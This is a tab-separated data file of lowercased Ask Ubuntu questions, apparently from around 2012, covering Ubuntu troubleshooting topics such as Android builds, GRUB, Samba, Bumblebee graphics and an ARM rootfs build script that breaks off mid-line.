124963	android not building on eclipse neither intellij on 12.04 lts	you might think this is an android related question , but , i tried building my android app on eclipse in 12.04 , and it just dont work . it doesnt generate r.java . the same problem is happening to intellij . the app was working correctly when i was using another os , now with 12.04 it just doesnt work . would it be the eclipse , or some compiler problem ? i 'm using the eclipse downloaded from ubuntu software center , which is indigo . 12.04 have some restriction related to android , or eclipse , intellij , everything related to java compiler associated with android ? thanks .
124965	aupeo online radio does n't work in chromium	on the webpage of aupeo online radio is the player visible , and the track it 's supposed to play is also visible . but it does n't start playing . i 'm using chromium in ubuntu 12.04 . how to solve this ?
124974	i need to format xp	i wish to format the hard drive and install ubuntu on a machine with xp installed . i am getting a prompt telling me that a volume is in use and then the forced unmount is failing . how can i get rid of xp please ?
124977	how to undo an operation done in terminal ?	i had deleted an important file once and later i had changed the permissions of a file which i am not able to revert now . is there any way through which i can undo delete or revert permissions on files while working with terminal ? and one more question about ubuntu ... why do we never get a dialog box asking 'are you sure you want to delete ' as compared to windows.i see it as a flaw in ubuntu gui . once you press delete , there it is in the trash but never prompts to ask if we really want it to be deleted and ofcourse , i know ppl would be like -- why you want reassurance before deleting ... it is a part of hci and should be implemented ( i am sorry , just a beginner ) .
124983	left part of dash is hidden off-screen	after getting new monitors and following instructions here , the markers to the left of icons in dash ( the ones which show open windows ) are nearly completely off-screen . how can i fix this ? xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 280.13 ( buildd @ yellow ) fri aug 5 12:31:28 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` acer a221hql '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 520 '' endsection section `` screen '' # removed option `` twinviewxineramainfoorder '' `` crt-1 '' # removed option `` metamodes '' `` dfp : nvidia-auto-select +0+0 , crt : nvidia-auto-select +1280+0 '' # removed option `` twinviewxineramainfoorder '' `` dfp-0 '' # removed option `` metamodes '' `` crt : nvidia-auto-select +1920+0 , dfp : nvidia-auto-select +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` crt-1 '' option `` metamodes '' `` crt : nvidia-auto-select +0+0 , dfp : nvidia-auto-select +1920+0 '' subsection `` display '' depth 24 endsubsection endsection
124988	how do i rename a new album in shotwell ?	i ca n't make or rename an album in shotwell.can anybody help me in renaming them ? my ubuntu version is 11.10 .
124989	can i install ubuntu 10.4 enterprise cloud in virtualbox	i would like install ubuntu enterprise cloud in virtual box and need to test it , will uec can be installed successfully in virtual box & where can i get tutorial for that .
124994	how to set fail2ban with apf ?	i just installed fail2ban and the apf firewall . those 2 seems to be not working together . fail2ban have added some ipatble rules but they are not working . when i issue `` /etc/init.d/iptables status '' it says `` bash : /etc/init.d/iptables : no such file or directory ... '' how can i make it work with apf ? i have ubuntu 11.04 in a vps !
124998	what filesystem should i use for a seagate momentus xt hybrid st750lx003 ?	i am considering upgrading my regular hdd hard drive on my laptop by the ssd/hdd seagate momentus xt hybrid st750lx003 hard drive , and i was wondering if i should take any particular consideration in choosing the file-system type when installing ubuntu 12.04 ? from this answer , i take i should use ext4 : configuration for samsung ssd 830
124999	distribution upgrade problem `` no new release found ''	i 'm using ubuntu 11.04 . the update manager once found the new release 'oneiric ' , and still shows up this screen when i log on use ssh : welcome to ubuntu 11.04 ( gnu/linux 2.6.38-14-generic x86_64 ) * documentation : https : //help.ubuntu.com/ 0 packages can be updated . 0 updates are security updates . new release 'oneiric ' available . run 'do-release-upgrade ' to upgrade to it . last login : wed apr 25 16:22:48 2012 from *** but i did n't upgrade then , and change my apt sources . and now i can not upgrade to 'oneiric ' . do-relase-upgrade shows : $ sudo do-release-upgrade checking for a new ubuntu release no new release found $ and apt-get dist-upgrade shows : $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ i can successfully update all my packages . file contents of source.list : $ cat /etc/apt/sources.list # # see sources.list ( 5 ) for more information , especialy # remember that you can only use http , ftp or file uris deb http : //mirrors.tuna.tsinghua.edu.cn/ubuntu/ natty main universe restricted multiverse deb-src http : //mirrors.tuna.tsinghua.edu.cn/ubuntu/ natty main universe restricted multiverse deb http : //mirrors.tuna.tsinghua.edu.cn/ubuntu/ natty-security universe main multiverse restricted deb-src http : //mirrors.tuna.tsinghua.edu.cn/ubuntu/ natty-security universe main multiverse restricted deb http : //mirrors.tuna.tsinghua.edu.cn/ubuntu/ natty-updates universe main multiverse restricted deb-src http : //mirrors.tuna.tsinghua.edu.cn/ubuntu/ natty-updates universe main multiverse restricted deb http : //mirrors.tuna.tsinghua.edu.cn/ubuntu/ natty-backports universe main multiverse restricted deb-src http : //mirrors.tuna.tsinghua.edu.cn/ubuntu/ natty-backports universe main multiverse restricted # deb http : //ubuntu.dormforce.net/ubuntu/ lucid main universe restricted multiverse # deb-src http : //ubuntu.dormforce.net/ubuntu/ lucid main universe restricted multiverse # deb http : //ubuntu.dormforce.net/ubuntu/ lucid-security universe main multiverse restricted # deb-src http : //ubuntu.dormforce.net/ubuntu/ lucid-security universe main multiverse restricted # deb http : //ubuntu.dormforce.net/ubuntu/ lucid-updates universe main multiverse restricted # deb-src http : //ubuntu.dormforce.net/ubuntu/ lucid-updates universe main multiverse restricted # cdroms are managed through the apt-cdrom tool . # deb http : //archive.canonical.com lucid partner # deb http : //archive.canonical.com lucid-security partner # deb http : //archive.canonical.com lucid-updates partner # deb-src http : //archive.canonical.com lucid partner # deb-src http : //archive.canonical.com lucid-security partner # deb-src http : //archive.canonical.com lucid-updates partner # medibuntu repo # deb http : //packages.medibuntu.org/ lucid free non-free # deb-src http : //packages.medibuntu.org/ lucid free non-free # deb http : //extras.ubuntu.com/ubuntu maverick main # third party developers repository deb http : //mirrors.sohu.com/ubuntu/ natty main restricted multiverse universe deb-src http : //mirrors.sohu.com/ubuntu/ natty main universe restricted multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu/ natty-security universe main multiverse restricted deb-src http : //mirrors.sohu.com/ubuntu/ natty-security universe main multiverse restricted deb http : //mirrors.sohu.com/ubuntu/ natty-updates universe main multiverse restricted deb-src http : //mirrors.sohu.com/ubuntu/ natty-updates universe main multiverse restricted file contents of /etc/update-manager/meta-release : $ cat /etc/update-manager/meta-release # default location for the meta-release file [ metarelease ] uri = http : //changelogs.ubuntu.com/meta-release uri_lts = http : //changelogs.ubuntu.com/meta-release-lts uri_unstable_postfix = -development uri_proposed_postfix = -proposed what may be the problem of this ?
125000	how do i recover ubuntu one files ?	i have uninstalled ubuntu one and deleted the `` ubuntu one '' directory . after reinstalling ubuntu one all files from onlinestorage and all connected pcs were gone . is there any way to recover the files ?
125002	how to configure samba	i wonder if there is someone here who knows how to configure samba in following situation . i live in a house where all computers are in a local area network . in windows i 'm able to see all my neighbours ' and roommates ' computers and i can explore my roommates ' shared folder ( because i have access to do that ) . in windows this is all possible automaticly . in ubuntu ( 12.04 ) i can see all my neighbours ' mac mahcines and few windows computers in nautilus ' `` network '' section but there is usually about 50 computers in network all the time so most of them are not shown . i ca n't find for example my roommates ' computer . i have n't changed any samba configurations yet . what should i do to see all computers in lan ?
125004	where can i get a better understanding of repositories ?	as the title suggests i would like to confirm my assumptions and get a better understanding of the ubuntu software repositories in terms of what is supported and getting updates . i will use gimp as an example ( but this question is not about gimp ) it’s a general question about repositories . i know i can install gimp from the usc and currently its version 6x from another repository “add-apt-repository ppa : otto-kesselgulasch/gimp” i can install gimp v8x are these assumptions correct ? both versions are supported eventually v8 will be available in usc in the ubuntu repositories to install i may have future issues during updates using a ppa that is not in the usc .
125014	can i use windows boot manager to boot into ubuntu 11.10	i want to use windows boot manager instead of grub to boot into ubuntu 11.10 1.grub looks something like this : ubuntu ubuntu ( recovery mode ) memory test memory test windows 7 2.windows boot manager looks like this : windows 7 ubuntu so windows boot manager looks more neat than grub , my problem is that i forgot how to install ubuntu 11.10 such that it uses windows boot manager to boot with windows 7 as the first option on the boot menu.any help ?
125015	can i install ubuntu inside windows ?	ubuntu 12.04 wo n't come with the windows installer ( wubi ) pre-added . but is there any way to install 12.04 using wubi ?
125019	why does ubuntu one files for android app create an entry in the 'accounts and sync ' section of the android settings menu ?	i have the ubuntu one app for android and its works perfectly fine but there always has been something that confused me . in my phones main settings menu in the accounts and sync section ubuntu one has created an entry : however it is n't possible to turn the sync on like can be seen on the google account above it , also there are no entries when you click on the ubuntu one account : in comparison the google sync account has lots of options : so why has ubuntu one created this account ? is it there for potential future functions which have not yet been implemented or is there another reason ?
125026	how do i simulate overprinting in adobe reader ?	on both mac and windows when i print a document there is an advanced screen that allows me to select an option called simulate overprinting , however such an option does n't appear on the ubuntu version . wikipedia on overprinting : overprinting refers to the process of printing one colour on top of another in reprographics . this is closely linked to the reprographic technique of 'trapping ' . another use of overprinting is to create a rich black ( often regarded as a colour that is `` blacker than black '' ) by printing black over another dark colour . this is an issue for us , as we 're trying to print documents that need flattening ( this is what overprinting does ) . am i missing something here , is there a way to enable overprinting on printed pdfs ? note : please do n't confuse simulate overprinting with overprint preview , of which does n't apply when printing . just to show you what i 'm looking for , this is the print > advanced screen ... and this is what i see on the ubuntu screen , not no option for overprinting
125029	how to make sms and mobile calls ?	will there be a way to send sms and make calls using mobile broadbands in 12.04 ? ( if there is a 3rd party app rather than wammu-gammu , please mention )
125031	why do some applications exit on their own without giving notification , error , or whatsoever ?	i have ubuntu 11.10 . i installed pcsx yesterday and that application exits on its own for a random time interval . its not giving me any error or notification . so what may be the cause of it exiting on its own ?
125032	double click on a file , causes the app to open in the background . how to make it open in the front of all windows ?	i am using ubuntu 11.10 . i noticed that when i click on an html file in the file manager ( i happened to be using nautilus 3.2.1 file manager ) , then firefox will open allright , but it opens hidden behind the file manager window that i was looking at when i did the clicking . is there an option to make the application that opens , to open in the front of all windows , so that i do not have to go search for it each time where it opened ( have to go move windows all the time ) . it will be nice actually if there was a bar thing where current application that are open are arranged on , so i can at least see what i have open . thank you
125036	how to delete open octave 2012	i installed open octave studio and midi 2012 according to the instructions from this ppa , but midi does not recognize the jack and does not works , so i want to delete it and studio . how can i delete it ?
125038	send e-mail to printer automatically	forgive me if this is is covered in the faq . i am looking for a way to send a file/web page from my playbook or smart phone to a printer , with out using google cloud . i used unix many years ago and if i remember correctly you can configure an account to send all incomming e-mail to the printer . is it possable to do this with ubuntu ? if yes , can it also be setup to limit by the from line ? thanks .
125040	after installation of bumblebee : i386 opengl apps stopped working	i 'm using ubuntu 12.04 on my notebook ( asus k53sv , i7-2670qm , intel hd 3000 , geforce 540m ) . in order to save energy i 've installed `` bumblebee '' , a solution for nvidia optimus technology on linux . so far , so good . since then , the lifetime of my battery increased a lot . but : if i try to open 32-bit apps like wine and this application uses opengl , it does n't work . it just runs on my 540m , when i put `` optirun '' before the `` wine '' command . but , for simple opengl applications i do n't need the power of my dedicated gpu . i 've used the offical bumblebee instalation guide , therefore i 've installed , the packages like `` virtualgl-libs : i386 , libgl1-mesa-glx : i386 , libc6 : i386 '' of course . so , what can i do to get my opengl accerleration on 32-bit applications working again ? thank you very much for your help ! - phenomz btw : my system sould by up to date . i 'm always installing the recent updates . ( i 'm also using the xorg-edgers ppa ) phenom @ notebook : ~/downloads/test $ wine test.exe err : module : load_builtin_dll failed to load .so lib for builtin l '' opengl32.dll '' : libgl.so.1 : kann die shared-object-datei nicht รถffnen : datei oder verzeichnis nicht gefunden err : module : import_dll loading library opengl32.dll ( which is needed by l '' z : \\home\\phenom\\downloads\\test\\test.exe '' ) failed ( error c000007a ) . err : module : ldrinitializethunk main exe initialization for l '' z : \\home\\phenom\\downloads\\test\\test.exe '' failed , status c0000135
125042	how do i prevent skype from starting another instance when it 's already running ?	update this problem is finally fixed with skype 4.0.0.7 for linux . this makes the question obsolete for every one who installed skype directly from the website . version 4.0+ will be included in the universe repositories for quantal ( ubuntu 12.10 ) . just a little unnecessary annoyance to fix here : suppose you have skype for ubuntu running . you accidentally click on the launcher again . the way it is now , skype starts a second instance , which promptly tells you it ca n't log in . there is another instance already running . to make things worse : on the next regular start of skype it you will have to re-enter your saved password , due to the `` sign in failure '' . i thought this would be fixed soon but neither canonical nor microsoft care enough . the annoyance continues to exist for the last three updates at least . so in an approach to provide a workaround i will post what i 've done to prevent this behaviour . maybe it 's useful for some of you . maybe it will rise awareness and cause a fix . i 'm happy for any better solution btw . and that 's the real purpose of my question . usually i do n't answer them myself . so doesn anyone know of a better solution to fix dual instancing of skype ?
125050	where do i report packaging bugs ? for example regarding dependencies	where do i report packaging bugs ? for example , if a package has a package has a 'dependency ' , which should actually be a 'recommends ' . or a package should accept a meta-package , but calls for a specific package instead . should i locate the package on launchpad , and file a bug ? or go upstream ?
125052	quick look for kde ?	as per title , i 'm searching if there is something similar to osx 's quick look or gnome 's gloobus preview for kde : searching google brought me to some kde 's brainstorms , but nothing more . also to duong pham website , where he suggest to add a dolphin sevice menu item installing gloobus preview and then create the .desktop file : this is not a solution , because you have to right click and select `` preview '' , rather than just press space . any idea ?
125057	invalid dvds on home player	dvds ripped and burned with native linux apps are `` invalid '' in my home dvd player , using dvdshrink or dvdfab through wine will yield a playable disc ? i figure its something simple i 've got set up wrong but all my searches i 've found no solution .
125061	truecrypt and pcmanfm	the lxde fm wo n't show the volume after mounting it in truecrypt . found this and this . is there any recommended way ?
125062	how can i find which desktop enviroment i am using ?	as the title : how can i find which desktop environment i am using ? i want to accomplish this using command line .
125073	move files from a directory to a directory in my path variable	i , m new in ubuntu and i know that i have to learn a lot ... .but i have to run this bioinformatic software called `` mira assembler '' and i tried but nothing happen ! ! to install it they ask me to copy or move the files and soft-links inside this directory to a directory in your $ path variable . i think i 've done following the commands that i found on this forum but it does n't work..i do n't know how i can do to run this program ... i 'm really in panic ! ! thanks a lot ! !
125075	windows disappeared from grub menu after deleting ubuntu partition	i was having problem with booting ubuntu . then i used easeus partition manager to delete the partition that has ubuntu . maybe i have done it wrong . because now i have also lost windows . luckily i came to know of a tool called boot repair from this forum . i used and here is the result from it paste bin boot info summary . can someone please decipher what this says and possibly help me out . thanks .
125076	bumblebee and nvidia settings : external monitor	i just installed bumblebee . i 'm finally able to enter into nvidia x settings using the `` optirun '' command . this is all great , but now i would like to get my second monitor working via the hdmi port . i 've read some suggestions from folks using their lenovo thinkpads etc ... there seems to be 3 options , switch to discrete graphics in the bios and force the proprietary drivers to run , and then make some editions to xorg.conf file , or switch to integrated graphics in the bios , or run optimus using bumblebee and then make some editions to the bumblebee xorg.conf file . i 'm running a lenovo u460s with a nvidia gt 218 ( geforce 305m ) card in it . i want to be able to use my vizio lcd tv as a monitor while at home and then the laptop 's screen while out and about . any thoughts about the best/easiest approach to make this happen ? also , what 's `` disper '' and how do i install and use it ?
125084	unable to create a symlink to a file	i am not able to create a simple symlink here . when i tried the command sudo ln –s /home/vivek/downloads/drush/drush /home/vivek/documents/ where drush is a file inside the folder named drush , i get the following error , ln : accessing `–s ' : no such file or directory then i tried giving the filename in the target path , sudo ln –s /home/vivek/downloads/drush/drush /home/vivek/documents/drush for which i got this , ln : target `/home/vivek/documents/drush ' is not a directory i even tried getting into the target directory ( i.e . /home/vivek/documents ) and typed the following command sudo ln –s /home/vivek/downloads/drush/drush but still got the same error message as follows ln : accessing `–s ' : no such file or directory what am i doing wrong here ? why is it expecting a target directory while i am only trying to create a symlink for a file ?
125086	how to get pygtk with python2.6 ? the update to 12.04 removes it . ( can not go python2.7 because of specific extensions )	i have updated to the latest 12.04 and it removes the pygtk bindings for python2.6 . i 've looked at the python-gtk package and it now installs only the lib for python2.7 . the problem is : i have an application that depends on gtk and python2.6 and i am sort of stuck : i can not go to python2.7 and there is no package that install it for python2.6 . note : i have the application source code dealing with gtk , so if necessary i can do the porting from gtk2 to gtk3 ( gi.repository and stuff ) .
125088	failed to install gnome-shell-extensions : missing separator	i 'm trying to install gnome-shell-extensions in terminal using these instructions : download gnome shell extensions by running following command : git clone git : //git.gnome.org/gnome-shell-extensions now access the directory from terminal by running following command : cd gnome-shell-extensions/ finally run this command to install the extension : ./autogen.sh -- prefix= $ home/.local -- enable-extensions= '' user-theme '' source : http : //www.noobslab.com/2011/10/beautiful-tron-legacy-and-aqua-themes.html when i go to 'make ' however , i get the following error : make [ 1 ] : entering directory `/home/z3r0/gnome-shell-extensions/extensions' making all in user-theme make [ 2 ] : entering directory `/home/z3r0/gnome-shell-extensions/extensions/user-theme' makefile:442 : *** missing separator . stop . make [ 2 ] : leaving directory `/home/z3r0/gnome-shell-extensions/extensions/user-theme' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/z3r0/gnome-shell-extensions/extensions' make : *** [ all-recursive ] error 1 i 've tried adding a tab to line 442 in : /home/z3r0/gnome-shell-extensions/makefile /home/z3r0/gnome-shell-extensions/extensions/makefile using gedit , but both files do n't save with the changes . any help is appreciated . thanks !
125091	i can not see blender . what information do i need to fix this ?	i just installed dual monitors and it has caused a lot of problems with the graphical interface . weather indicator is n't working right , workspace changer does n't do what its supposed to , everything looks like windows 95 , no cool precise pangolin interface , etc . all that stuff i can live with for the moment , but my main problem now is that i can not see blender , which is a program that i use a lot to make digital art . when i open it on one monitor its just like a clear window to whatever it is behind it . i can see the cross hair mouse cursor like its there , but i can not see what i am working on . when i move a window across it it just repeats that window in a ghostlike trail . i uninstalled and re-installed it and i get the same result . rebooting does n't do anything either . this makes me believe that the problem is with my nvidia accelerated graphics driver i have installed . what information do i need to look into this issue and how can i fix it ? more info : i ran this to check my hardware : sudo lshw , and got this : http : //pastebin.ubuntu.com/944869/ . i also ran this because i read somewhere its supposed to help you debug video problems : libgl_debug=verbose glxinfo and got this , http : //pastebin.ubuntu.com/944871/ . i wish i knew what it all means . when i run this : lspci to check more hardware specs i get this : 00:00.0 ram memory : nvidia corporation mcp61 host bridge ( rev a1 ) 00:01.0 isa bridge : nvidia corporation mcp61 lpc bridge ( rev a2 ) 00:01.1 smbus : nvidia corporation mcp61 smbus ( rev a2 ) 00:01.2 ram memory : nvidia corporation mcp61 memory controller ( rev a2 ) 00:02.0 usb controller : nvidia corporation mcp61 usb 1.1 controller ( rev a3 ) 00:02.1 usb controller : nvidia corporation mcp61 usb 2.0 controller ( rev a3 ) 00:04.0 pci bridge : nvidia corporation mcp61 pci bridge ( rev a1 ) 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) 00:06.0 ide interface : nvidia corporation mcp61 ide ( rev a2 ) 00:07.0 bridge : nvidia corporation mcp61 ethernet ( rev a2 ) 00:08.0 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:08.1 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:09.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0b.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0c.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0d.0 vga compatible controller : nvidia corporation c61 [ geforce 7025 / nforce 630a ] ( rev a2 ) 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 02:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 210 ] ( rev a2 ) 02:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 )
125093	what does this mean ? `libgl_debug=verbose glxinfo` ?	i type this libgl_debug=verbose glxinfo because its supposed to help debug video problems and i get this http : //pastebin.ubuntu.com/944871/ what does it all mean ? where can i learn more ? what do you do with it ?
125094	wireless signal strength indicator shows low signals when actually signals are good	i 'm running 12.04 . although my wireless connection is performing perfectly well , the wireless signal strength indicator shows a low signal . only the bottom bar is illuminated , whereas with ubuntu 11.10 , the indicator was fully lit up . my wireless card is usb , and lsusb output is : bus 002 device 004 : id 148f:3072 ralink technology , corp. rt3072 wireless adapter how can i solve this ?
125097	laptop wakes while lid is closed and overheats	i 'm running 12.04 on a toshiba l305d with athlon x2 ( already suspect this has something to do with it ) . my laptop will wake from suspend , presumably from wireless scanning . this is a serious bug as sleeping laptops are often inside bags , so the cooling system is effectively disabled . i can no longer seriously use ubuntu when i have to worry about hardware damage every time i close the lid . there is shockingly lack of information about anything close to this . so many control panels have been removed or dumbed down , and everyone seems to want this behavior instead of the opposite , for servers or torrents of whatever . well , most laptop users will 99 % be likely to regularly put their laptop in a backpack or briefcase or other bag . does anyone know how to fix this ?
125100	ccpd starting problem in ubuntu 11.10	how can add the following command to start up ? now i manually enter this command in each time the computer start up for using canon lbp 2900 printer sudo /etc/init.d/ccpd start
125106	which hidden folder in my home folder contain the data for the passwords and keys application ?	i made a fresh install of precise pangolin beta from oneiric . i saved my home folder on an external drive . now i want to copy passwords and keys to the new installation .
125111	failed to download repository information due to missing cdrom	when updating i got this error message : w : failed to fetch cdrom : //ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) /dists/oneiric/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //ppa.launchpad.net/synce/ubuntu/dists/your_ubuntu_version/main/source/sources 404 not found what to do ?
125113	how to delete an efi partition on an external hdd without affecting other partitions ?	i 've got a 2 tb external hdd . the hdd is partitioned into 3 partitions : 200 mb efi partition and two about 1 tb fat32 partitions . formatting the whole drive is n't an option because there is important data on the drive . is there a way to delete the efi partition without affecting the other two partitions ?
125115	how to solve gnome power manager installation problem ?	i installed my updates today and now i ca n't login due to a fault . after booting , the login screen and the message about installation fault for gnome power manager appears . after logging in , the system returns to the login screen again with the error message . i tried to boot using older kernel versions , but the same error appears . how do i solve this problem ? the exact error message is : gnome power management is not configured properly , and ask the administrator to fix it .
125118	what time can i start downloading ubuntu 12.04 ?	i was wondering at what time i 'd be able to start my ubuntu 12.04 download ! i am competing with my friend as to who 'll get it first ! please help !
125121	unity lens not included in global search	i 'm using the quickly unity lens template here http : //developer.ubuntu.com/2012/04/how-to-create-a-wikipedia-unity-lens-for-ubuntu/ it works quite all right , but even though i have set search_in_global to true the global search calls my lens 's search function without the entered search parameter , thus it returns everything it can find : class meta : name = 'mylens' description = 'my lens' search_hint = 'search my lens' icon = 'mylens.svg' search_on_blank=true search_in_global=true # does n't seem to work when i type in a global search my search function is not called with the entered phrases but with a blank string/null : def search ( self , search , results ) : print `` searching for % s '' % search # ... can anyone help me out here ? thanks for the quick reply ! i added the proposed method like so : def global_search ( self , search , results ) : print `` searching globally for % s '' % search self.search ( search , results ) unfortunally the output when i type anything in the global dash does n't change a lot : leopard2a5 @ spieleknecht : ~/desktop/mylens $ quickly run searching globally for searching for
125123	vertical resolution over vnc multiplied by 12	i run ubuntu 11.10 with 2 monitors at a resolution of 3840x1080 . this is done via nvidia 's twinview mode . when i run the following command : x11vnc -safer -localhost -once -display :0 -ncache 10 -ncache_cr -geometry 3840x1080 and connect from a windows machine with tightvnc , my connection lists the resolution as 3840x12960 . that is 12 x 1080 if you do n't feel like doing the math . the top part of the vnc connection looks normal but i can scroll down a lot and i see ghosts of previous windows . any idea why or how to stop this ?
125125	qemu-system-arm fails with `` kernel panic - not syncing : attempted to kill init ! ''	i am trying to build an arm rootfs using ubuntu 12.04 ( but i get the same problem also with 11.10 ) . i am following this http : //www.metoolabs.com/index.php ? option=com_content & view=article & id=101 & itemid=124 & 1c822bc166df96723322cb11ff511844=fdtnphqgi qemu-system-arm is called with qemu-system-arm -m versatilepb -kernel $ { builddir } /qemu-vmlinuz -no-reboot -nographic -pidfile $ { qemupid } -hda $ { imagename } -m 256m -append console=ttyama0,115200n8 root=/dev/sda rw init=/bin/installer quiet full script used ( build-arm-rootfs ) is # ! /bin/sh # # copyright ( c ) 2009 canonical # # author : oliver grawert < ogra @ canonical.com > # # this program is free software ; you can redistribute it and/or # modify it under the terms of the gnu general public license as # published by the free software foundation ; either version 2 of the # license , or ( at your option ) any later version . # # this program is distributed in the hope that it will be useful , # but without any warranty ; without even the implied warranty of # merchantability or fitness for a particular purpose . see the # gnu general public license for more details . # # you should have received a copy of the gnu general public license # along with this program ; if not , write to the free software # foundation , inc. , 59 temple place , suite 330 , boston , ma 02111-1307 # usa # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # this script creates a tgz file of an armel rootfs you can untar in # # a partition for your target hardware ( beagleboard , evm or freescale # # board were tested with this yet ) # # see https : //wiki.ubuntu.com/arm/rootfsfromscratch for more details # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # todo : - install langpacks for selected locale # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # set -e trap cleanup 1 2 3 6 cleanup ( ) { echo `` i : cleaning up ... '' echo `` i : killed ... `` > > $ log 2 > & 1 # kill debootstrap if its running if [ -e $ { dbpid } ] ; then dpid= $ ( cat $ { dbpid } ) kill -9 $ dpid > /dev/null 2 > & 1 fi # kill qemu if its running if [ -e $ { qemupid } ] ; then qpid= $ ( cat $ { qemupid } ) kill -9 $ qpid > /dev/null 2 > & 1 fi for i in 1 2 3 4 5 ; do echo -n ' . ' sleep 1 done echo savelog # unmount loop mount if [ `` $ ( mount| grep $ { mountpoint } ) '' ] ; then umount $ mountpoint fi # wipe builddir rm -rf $ builddir echo `` i : done ... '' exit 0 } usage ( ) { echo `` usage : $ ( basename $ 0 ) -f < hostname > -l < login name > -p < password > [ option ] '' echo ' required options : -f -- fqdn < hostname > hostname to be used for the target system -l -- login < login name > login id of the admin user created during setup -p -- password < password > password of the admin user created during setup additional options : -h -- help this help -n -- fullname < quoted string > full name of the admin user created during setup ( default : `` ubuntu system user '' ) -s -- seed < csv list > list of packages to install ( i.e . ubuntu-desktop ) ( default : ubuntu-minimal ) -i -- imagesize < size > m/g size of the target filesystem to be created ( i.e . 500m ) ( default : 1g ) -m -- mirror < url > apt mirror to use ( i.e . http : //ports.ubuntu.com/ubuntu-ports ) ( default : http : //ports.ubuntu.com/ubuntu-ports ) -c -- components < csv list > archive components ( default : main , universe ) -t -- timezone < timezone > timezone for the system ( i.e . europe/berlin ) ( default : buildsystem timezone ) -x -- locale < locale.encoding > language used in the installed system ( i.e . en_us.utf-8 ) ( default : buildsystem locale ) keyboard options : -- kblayout < layout > keyboard layout ( i.e . us ) ( default : buildsystem kblayout ) -- kbmodel < model > keyboard model ( i.e . pc105 ) ( default : buildsystem kbmodel ) -- kbvariant < variant > keyboard variant ( i.e . nodeadkeys ) ( default : buildsystem kbvariant ) -- kboptions < options > additional keyboard options ( default : buildsystem kboptions ) output options : -- keepimage keep the qemu image instead of deleting it -- notarball do not roll a tarball of the rootfs ( autosets -- keepimage ) extra parameters : -q -- quiet quiet operation , only write to log ' exit 0 } checkparm ( ) { if [ `` $ ( echo $ 1|grep ^'\- ' ) '' ] ; then echo `` e : need an argument '' usage fi } savelog ( ) { mv $ log $ dir/ echo `` i : a logfile was saved as $ dir/ $ ( basename $ 0 ) - $ stamp.log '' } create_raw_image ( ) { [ $ quiet ] || echo `` i : creating temporary image '' lang=c qemu-img create $ imagename $ imagesize > $ log 2 > & 1 lang=c mkfs.ext2 -f $ imagename > > $ log 2 > & 1 } mount_image ( ) { [ $ quiet ] || echo `` i : mounting temporary image '' if [ ! -d $ mountpoint ] ; then mkdir -p $ mountpoint > > $ log 2 > & 1 fi mount -o loop $ imagename $ mountpoint > > $ log 2 > & 1 } run_first_stage ( ) { [ $ quiet ] || echo `` i : running first stage '' mkfifo $ dbfifo lang=c debootstrap -- foreign -- arch=armel precise $ mountpoint $ mirror > $ dbfifo 2 > & 1 & echo $ ! > $ dbpid while read line ; do echo $ { line } > > $ log 2 > & 1 if [ ! `` $ quiet '' ] ; then echo `` $ { line } '' fi done < $ dbfifo rm -f $ dbfifo rm -f $ dbpid [ $ quiet ] || echo `` i : first stage install done '' } run_vm ( ) { # get kernel [ $ quiet ] || echo `` i : getting virtual machine kernel from the server '' lang=c wget -o $ builddir/qemu-vmlinuz $ kernel > > $ log 2 > & 1 mkfifo $ qemufifo [ $ quiet ] || echo `` i : switching to virtual machine for second stage processing '' qemuopts= '' -m versatilepb -kernel $ { builddir } /qemu-vmlinuz -no-reboot -nographic -pidfile $ { qemupid } -hda $ { imagename } -m 256m '' append= '' console=ttyama0,115200n8 root=/dev/sda rw init=/bin/installer quiet '' qemu-system-arm $ qemuopts -append `` $ { append } '' > $ qemufifo 2 > & 1 & while read line ; do if [ `` $ ( echo $ line|grep panic ) '' ] ; then echo $ { line } > > $ log 2 > & 1 echo `` e : second stage build in virtual machine failed ! '' echo `` e : please see the log to see what went wrong . '' cleanup fi if [ `` $ 